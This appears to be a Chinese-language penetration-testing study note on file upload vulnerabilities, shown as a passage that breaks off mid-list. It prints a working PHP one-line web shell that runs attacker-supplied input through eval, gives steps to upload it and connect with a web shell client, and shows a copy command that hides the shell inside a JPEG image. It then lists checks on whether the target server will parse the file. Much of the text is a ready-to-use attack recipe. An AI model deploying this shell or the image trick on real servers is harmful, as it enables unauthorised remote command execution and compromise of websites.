文件上传:文件上传可以与文件包含相结合
1.文件上传漏洞:
文件上传漏洞需要的前提条件:
- 能上传木马
- 上传的木马能执行
- 还要清楚上传后的路径
一句话木马:<?php @eval($_POST[cmd]);?>
eval 执行命令函数
思路:
- 编写一个一句话木马<?php?>
- 上传一句话木马
- 上菜刀
图片马制作:
- 找个图片,用记事本打开,添加一句话
- 在图片和一句话所处的路径下:copy 1.jpg/b+a.php/a 2.jpg
基本流程:
- 图片是否正常上传
- 图片上传内容是否被感染(内容替换)
- 上传的域名是否是目标服务器
如果不是,那么判断图片服务器是否解析(php、asp、aspx、jsp、cfm、shtml等)
- 上次的目录是否支持解析(php、asp、aspx、jsp、pht、p